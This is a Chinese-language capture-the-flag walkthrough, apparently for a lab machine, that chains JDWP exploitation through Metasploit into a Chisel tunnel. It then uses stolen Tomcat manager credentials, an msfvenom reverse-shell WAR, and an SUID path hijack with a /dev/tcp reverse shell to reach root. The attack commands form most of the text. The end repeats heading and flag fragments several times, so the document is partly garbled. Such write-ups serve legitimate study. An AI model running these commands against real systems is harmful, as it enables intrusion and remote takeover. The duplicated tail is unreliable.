JDWP+Tomcat漏洞利用与权限提升实战教学<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用Nmap进行全端口扫描，发现以下开放服务：<\/p>

nmap -sV -sC 192.168.8.100 -p- --min-rate 1000<\/span> -Pn
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

21\/tcp<\/strong>: FTP服务 (vsFTPd 3.0.2)

允许匿名登录但无法列出目录<\/li>
<\/ul>
<\/li>
8009\/tcp<\/strong>: AJP13协议 (Apache Jserv)<\/li>
9001\/tcp<\/strong>: JDWP服务 (Java Debug Wire Protocol)<\/li>
<\/ul>
1.2 服务识别<\/h3>

FTP服务<\/strong>: 匿名登录尝试失败<\/li>
AJP13<\/strong>: Apache Tomcat连接器协议<\/li>
JDWP<\/strong>: Java调试协议，存在未授权访问风险<\/li>
<\/ul>
2. JDWP漏洞利用<\/h2>
2.1 手动验证JDWP服务<\/h3>
使用jdb工具连接JDWP服务：<\/p>
jdb -attach 192.168.8.100:9001
<\/span><\/span>> threads
<\/span><\/span>> interrupt 1<\/span>
<\/span><\/span><\/code><\/pre>2.2 使用Metasploit自动化利用<\/h3>
msfconsole
<\/span><\/span>use exploit\/multi\/misc\/java_jdwp_debugger
<\/span><\/span>set RHOSTS 192.168.8.100
<\/span><\/span>set RPORT 9001<\/span>
<\/span><\/span>set payload linux\/x86\/meterpreter\/reverse_tcp
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>成功获取meterpreter会话后，检查网络连接：<\/p>
meterpreter > netstat -ano
<\/span><\/span><\/code><\/pre>发现8080端口运行Tomcat服务但无法直接访问。<\/p>
3. 端口转发与Tomcat访问<\/h2>
3.1 使用Chisel进行端口转发<\/h3>
在攻击机(Kali)启动Chisel服务器：<\/p>
.\/chisel server -p 8000<\/span> --reverse
<\/span><\/span><\/code><\/pre>在目标机上传并运行Chisel客户端：<\/p>
curl http:\/\/192.168.8.107\/chisel -O chisel
<\/span><\/span>chmod +x chisel
<\/span><\/span>.\/chisel client 192.168.8.107:8000 R:8080:localhost:8080
<\/span><\/span><\/code><\/pre>3.2 访问Tomcat管理界面<\/h3>
通过本地转发访问：

http:\/\/127.0.0.1:8080\/manager\/html<\/code><\/p>
3.3 获取Tomcat凭据<\/h3>
读取Tomcat用户配置文件：<\/p>
cat \/etc\/tomcat\/tomcat-users.xml
<\/span><\/span><\/code><\/pre>获取凭据：<\/p>

用户名: sl33py<\/code><\/li>
密码: Gu3SSmYStR0NgPa$sw0rD!<\/code><\/li>
<\/ul>
4. 获取Tomcat Shell<\/h2>
4.1 生成恶意WAR包<\/h3>
msfvenom -p java\/jsp_shell_reverse_tcp LHOST=<\/span>192.168.8.107 LPORT=<\/span>10032<\/span> -f war > shell.war
<\/span><\/span><\/code><\/pre>4.2 设置监听<\/h3>
use exploit\/multi\/handler
<\/span><\/span>set payload java\/jsp_shell_reverse_tcp
<\/span><\/span>set LHOST 192.168.8.107
<\/span><\/span>set LPORT 10032<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>4.3 部署并访问WAR包<\/h3>
通过Tomcat管理界面上传shell.war，访问：

http:\/\/127.0.0.1:8080\/shell\/<\/code><\/p>
获取第一个flag：

5a5946b264f0f12355ddc51693bbb255<\/code><\/p>
5. 权限提升<\/h2>
5.1 查找SUID文件<\/h3>
find \/ -perm -4000 -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现可疑文件\/usr\/bin\/nightmare<\/code><\/p>
5.2 分析nightmare程序<\/h3>
关键发现：<\/p>

程序尝试打开\/dev\/tty<\/code><\/li>
包含fire<\/code>函数<\/li>
使用aalib<\/code>库(ASCII艺术库)<\/li>
关键系统调用：
setresuid(0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span>setresgid(0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span>system("\/usr\/bin\/sl -al"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5.3 利用路径劫持<\/h3>

创建恶意函数替代\/usr\/bin\/sl<\/code>：<\/li>
<\/ol>
function<\/span> \/usr\/bin\/sl ()<\/span> {<\/span> \/bin\/bash >& \/dev\/tcp\/192.168.8.107\/10033 0>&1;}<\/span>
<\/span><\/span>export -f \/usr\/bin\/sl
<\/span><\/span><\/code><\/pre>
运行nightmare程序：<\/li>
<\/ol>
\/usr\/bin\/nightmare
<\/span><\/span><\/code><\/pre>
当程序退出时(ctrl+c)，会自动调用被劫持的\/usr\/bin\/sl<\/code>函数，获得root shell<\/li>
<\/ol>
5.4 获取root flag<\/h3>
92f64746d7cd155607533c778774b995<\/code><\/p>
6. 关键知识点总结<\/h2>


JDWP漏洞利用<\/strong>：<\/p>

Java调试协议未授权访问<\/li>
可通过jdb手动验证或使用Metasploit自动化利用<\/li>
<\/ul>
<\/li>

端口转发技术<\/strong>：<\/p>

使用Chisel进行反向端口转发<\/li>
解决内网服务不可达问题<\/li>
<\/ul>
<\/li>

Tomcat管理界面利用<\/strong>：<\/p>

通过读取配置文件获取凭据<\/li>
WAR包部署获取反向shell<\/li>
<\/ul>
<\/li>

Linux权限提升技巧<\/strong>：<\/p>

SUID文件查找与分析<\/li>
环境变量与函数劫持<\/li>
利用程序中的系统调用进行提权<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

关闭不必要的Java调试服务<\/li>
加强Tomcat配置文件权限<\/li>
定期检查系统SUID文件<\/li>
限制用户环境变量修改权限<\/li>
<\/ul>
<\/li>
<\/ol>

JDWP+Tomcat漏洞利用与权限提升实战教学<\/h1>

1. 信息收集阶段<\/h2>

2. JDWP漏洞利用<\/h2>

3. 端口转发与Tomcat访问<\/h2>

3.2 访问Tomcat管理界面<\/h3>
通过本地转发访问：
`http:\/\/127.0.0.1:8080\/manager\/html<\/code><\/p>`

4. 获取Tomcat Shell<\/h2>

4.3 部署并访问WAR包<\/h3>
通过Tomcat管理界面上传shell.war，访问：
`http:\/\/127.0.0.1:8080\/shell\/<\/code><\/p>`
`获取第一个flag： 5a5946b264f0f12355ddc51693bbb255<\/code><\/p>`

5.4 获取root flag<\/h3>
`92f64746d7cd155607533c778774b995<\/code><\/p>`

JDWP+Tomcat漏洞利用与权限提升实战教学<\/h1>

1. 信息收集阶段<\/h2>

2. JDWP漏洞利用<\/h2>

3. 端口转发与Tomcat访问<\/h2>

3.2 访问Tomcat管理界面<\/h3> 通过本地转发访问： http:\/\/127.0.0.1:8080\/manager\/html<\/code><\/p>

4. 获取Tomcat Shell<\/h2>

4.3 部署并访问WAR包<\/h3> 通过Tomcat管理界面上传shell.war，访问： http:\/\/127.0.0.1:8080\/shell\/<\/code><\/p> 获取第一个flag： 5a5946b264f0f12355ddc51693bbb255<\/code><\/p>

5.4 获取root flag<\/h3> 92f64746d7cd155607533c778774b995<\/code><\/p>

3.2 访问Tomcat管理界面<\/h3>
通过本地转发访问：
`http:\/\/127.0.0.1:8080\/manager\/html<\/code><\/p>`

4.3 部署并访问WAR包<\/h3>
通过Tomcat管理界面上传shell.war，访问：
`http:\/\/127.0.0.1:8080\/shell\/<\/code><\/p>`
`获取第一个flag： 5a5946b264f0f12355ddc51693bbb255<\/code><\/p>`

5.4 获取root flag<\/h3>
`92f64746d7cd155607533c778774b995<\/code><\/p>`